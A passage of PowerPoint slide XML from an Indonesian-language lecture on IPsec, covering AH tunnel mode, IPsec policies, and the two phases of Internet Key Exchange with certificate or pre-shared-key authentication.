              <a:t>. AH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358119522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Pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AH/ESP dan mode transport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua peer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan hashing IPsec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Rahasia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet Key Exchange (IKE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Himpunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>properti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asosiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Negosiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IKE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlangsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Fase I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Diffie-Hellman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Fase II</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Fase I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AH dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ESP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
